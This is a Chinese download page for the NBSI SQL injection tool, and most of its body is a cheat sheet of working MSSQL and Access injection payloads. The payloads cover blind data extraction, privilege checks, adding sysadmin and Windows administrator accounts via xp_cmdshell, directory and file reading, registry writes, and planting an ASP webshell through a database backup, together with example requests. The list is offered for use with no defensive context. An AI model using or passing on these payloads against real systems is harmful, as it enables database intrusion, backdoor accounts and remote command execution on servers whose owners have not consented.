NBSI注入漏洞检测工具
v3.0.1 绿色中文版大小:119.00 KB更新:2018/11/08
类别:系统安全系统:Winll
分类分类
大小:119.00 KB更新:2018/11/08
类别:系统安全系统:Winll
解压密码:www.itmop.com
NBSI注入漏洞检测工具是一款功能强大的软件,由vb语言编写的网站漏洞检测工具的名称,ASP注入漏洞检测工具,特别在sql server注入检测方面有极高的准确率。
1.判断是否有注入
;and 1=1
;and 1=2
2.初步判断是否是mssql
;and user>0
3.判断数据库系统
;and (select count(*) from sysobjects)>0 mssql
;and (select count(*) from msysobjects)>0 access
4.注入参数是字符
'and [查询条件] and ''='
5.搜索时没过滤参数的
'and [查询条件] and '%25'='
6.猜数据库
;and (Select Count(*) from [数据库名])>0
7.猜字段
;and (Select Count(字段名) from 数据库名)>0
8.猜字段中记录长度
;and (select top 1 len(字段名) from 数据库名)>0
9.(1)猜字段的ascii值(access)
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0
(2)猜字段的ascii值(mssql)
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0
10.测试权限结构(mssql)
;and 1=(SELECT IS_SRVROLEMEMBER('sysadmin'));--
;and 1=(SELECT IS_SRVROLEMEMBER('serveradmin'));--
;and 1=(SELECT IS_SRVROLEMEMBER('setupadmin'));--
;and 1=(SELECT IS_SRVROLEMEMBER('securityadmin'));--
;and 1=(SELECT IS_SRVROLEMEMBER('diskadmin'));--
;and 1=(SELECT IS_SRVROLEMEMBER('bulkadmin'));--
;and 1=(SELECT IS_MEMBER('db_owner'));--
11.添加mssql和系统的帐户
;exec master.dbo.sp_addlogin username;--
;exec master.dbo.sp_password null,
username,password;--
;exec master.dbo.sp_addsrvrolemember sysadmin
username;--
;exec master.dbo.xp_cmdshell 'net user username
password /workstations:* /times:all
/passwordchg:yes /passwordreq:yes /active:yes /add'
;--
;exec master.dbo.xp_cmdshell 'net user username
password /add';--
;exec master.dbo.xp_cmdshell 'net localgroup
administrators username /add';--
12.(1)遍历目录
;create table dirs(paths varchar(100), id int)
;insert dirs exec master.dbo.xp_dirtree 'c:'
;and (select top 1 paths from dirs)>0
;and (select top 1 paths from dirs where paths not
in('上步得到的paths'))>)
(2)遍历目录
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));--
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器
;insert into temp(id) exec master.dbo.xp_subdirs 'c:';-- 获得子目录列表
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:';-- 获得所有子目录的目录树结构
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:webindex.asp';-- 查看文件的内容
13.mssql中的存储过程
xp_regenumvalues 注册表根键, 子键
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE',
'SOFTWAREMicrosoftWindowsCurrentVersionRun' 以多个记录集方式返回所有键值
xp_regread 根键,子键,键值名
;exec xp_regread 'HKEY_LOCAL_MACHINE',
'SOFTWAREMicrosoftWindowsCurrentVersion',
'CommonFilesDir' 返回制定键的值
xp_regwrite 根键,子键, 值名, 值类型, 值
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型
;exec xp_regwrite 'HKEY_LOCAL_MACHINE',
'SOFTWAREMicrosoftWindowsCurrentVersion',
'TestValueName','reg_sz','hello' 写入注册表
xp_regdeletevalue 根键,子键,值名
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE',
'SOFTWAREMicrosoftWindowsCurrentVersion',
'TestValueName' 删除某个值
xp_regdeletekey 'HKEY_LOCAL_MACHINE',
'SOFTWAREMicrosoftWindowsCurrentVersionTestkey' 删除键,包括该键下所有值
14.mssql的backup创建webshell
use model
create table cmd(str image);
insert into cmd(str) values ('<% Dim oScript %>');
backup database model to disk='c:l.asp';
15.mssql内置函数
;and (select @@version)>0 获得Windows的版本号
;and user_name()='dbo' 判断当前系统的连接用户是不是sa
;and (select user_name())>0 爆当前系统的连接用户
;and (select db_name())>0 得到当前连接的数据库
16.简洁的webshell
use model
create table cmd(str image);
insert into cmd(str) values ('<%=server.createobject(&wscript.shell&).exec(&cmd.exe /c &&request(&c&)).stdout.readall%>');
backup database model to disk='g:wwwtestl.asp';
请求的时候,像这样子用:
http://ip/l.asp?c=dir
腾讯电脑管家pc版安装包系统安全62.96 MBv15.4.22893.220 官方最新版
详情火绒Aurora专用解密工具系统安全1.07 MBv1.0.0.2 绿色版
详情荣耀magicbook电脑管家系统安全232.19 MBv13.0.2.310 官方版
详情QQ电脑管家纯净版(QQguanjia)系统安全62.96 MBv12.0 官方最新版
详情天融信终端防御系统系统安全14.70 MBv1.0.13.1 安装版
详情QQ电脑管家2022最新版系统安全62.12 MBv15.4.22893.220 官方版
详情腾讯电脑管家个人版pc版系统安全62.96 MBv15.4.22893.220 官方正式版
详情2345安全卫士电脑版系统安全95.54 MBv7.9.1.13925 官方正式版
详情Sandboxie Plus沙盒32位/64位系统安全30.90 MBv1.0.20 中文免费版
详情360安全卫士冰雪运动版系统安全75.82 MBv15.15.0.0.1021 安装版
详情挖掘鸡系统安全4.16 MBv9.2 绿色免费版
详情腾讯电脑管家离线安装包(QQPCMgr)系统安全62.96 MBv15.4.22893.220 官方安装版
详情腾讯电脑管家win10专版系统安全1.95 MBv15.0.22122.210 简体中文官方安装版
详情MBSA安全检测工具系统安全2.40 MBv2.2 官方免费版
详情腾讯电脑管家8.0正式版系统安全30.60 MBv8.0 官方免费版
详情卡巴斯基安全软件2019系统安全151.90 MB破解版
详情腾讯电脑管家小团队版系统安全10.80 MBv213.10.21930.301 官方版
详情2022腾讯电脑管家体验版系统安全1.89 MBv16.0.23595.221 官方版
详情微软电脑管家内测版系统安全55.08 MBv1.1.0.2518 官方版
详情诺顿360中文破解版系统安全120.00 MBv22.5.0.124 免激活版
详情点击查看更多
腾讯电脑管家离线安装包(QQPCMgr)系统安全62.96 MBv15.4.22893.220 官方安装版
详情QQ电脑管家纯净版(QQguanjia)系统安全62.96 MBv12.0 官方最新版
详情荣耀magicbook电脑管家系统安全232.19 MBv13.0.2.310 官方版
详情腾讯电脑管家pc版安装包系统安全62.96 MBv15.4.22893.220 官方最新版
详情pangolin(穿山甲sql注入工具)系统安全30.80 MBv4.1 绿色多语版
详情华为电脑管家第三方电脑安装版系统安全184.00 MBv11.1.6.31 最新版
详情火绒互联网安全软件系统安全22.07 MBv5.0.71.2-2022.11.21.1 官方版
详情2022腾讯电脑管家体验版系统安全1.89 MBv16.0.23595.221 官方版
详情火绒安全软件包含扩展工具完整版系统安全21.99 MBv5.0.72.1 官方个人免费版
详情QQ电脑管家2022最新版系统安全62.12 MBv15.4.22893.220 官方版
详情360安全卫士国产系统适配专版系统安全62.55 MBv1.0.0.1018 官方版
详情瑞星卡卡上网安全助手6.0系统安全10.15 MBv6.2.4.63 官方安装版
详情腾讯电脑管家个人版pc版系统安全62.96 MBv15.4.22893.220 官方正式版
详情冰刃(IceSword)系统安全2.04 MBv1.22 免安装中文版
详情ettercap for windows(强大的arp欺骗工具)系统安全6.26 MBv0.8.2 官网版
详情超级巡警(Anti-Spyware Toolkit)系统安全12.59 MBv5.1.11.186 官方版
详情腾讯电脑管家win10专版系统安全1.95 MBv15.0.22122.210 简体中文官方安装版
详情360电脑管家最新版2023(安全卫士)系统安全83.93 MBv13.0.0.2079 官方正式版
详情QQ医生免费版(QQDoctor)系统安全7.51 MBv3.3 绿色版
详情BackTrack5 r3中文版iso系统安全3.09 GBU盘版
详情点击查看更多
360系统漏洞修复独立版系统安全22.11 MBv9.6 绿色提取版
详情冰刃(IceSword)系统安全2.04 MBv1.22 免安装中文版
详情网站安全狗系统安全36.90 MBv4.0.22290 官方iis版
详情360游戏保险箱系统安全9.18 MBv7.3.1.1011 官方正式版
详情超级巡警(Anti-Spyware Toolkit)系统安全12.59 MBv5.1.11.186 官方版
详情ESET Smart Security(ESET NOD32 9.0安全套装)系统安全93.56 MBv9.0 中文免费版
详情瑞星卡卡上网安全助手6.0系统安全10.15 MBv6.2.4.63 官方安装版
详情2345安全卫士电脑版系统安全95.54 MBv7.9.1.13925 官方正式版
详情乐网软件管家系统安全30.90 MBv2.0.0.0 绿色版
详情QQ电脑管家2022最新版系统安全62.12 MBv15.4.22893.220 官方版
详情腾讯电脑管家pc版安装包系统安全62.96 MBv15.4.22893.220 官方最新版
详情360安全保险箱(360Safebox)系统安全5.84 MBv5.0 绿色版
详情金山急救箱单文件版系统安全26.27 MBv3.5 免费绿色版
详情蜂巢安全管家系统安全9.69 MBv3.0.2 官方最新版
详情安全狗服云客户端系统安全13.52 MBv2.5.1 官网pc版
详情火绒互联网安全软件系统安全22.07 MBv5.0.71.2-2022.11.21.1 官方版
详情莱卡安全助手系统安全2.91 MBv2014.1112绿色版
详情360闪电云鉴定器独立版系统安全2.83 MBv1.0.0.1030 官方绿色版
详情腾讯电脑管家个人版pc版系统安全62.96 MBv15.4.22893.220 官方正式版
详情金山毒霸CPU漏洞免疫工具系统安全1.62 MBv1.0 官方版
详情点击查看更多
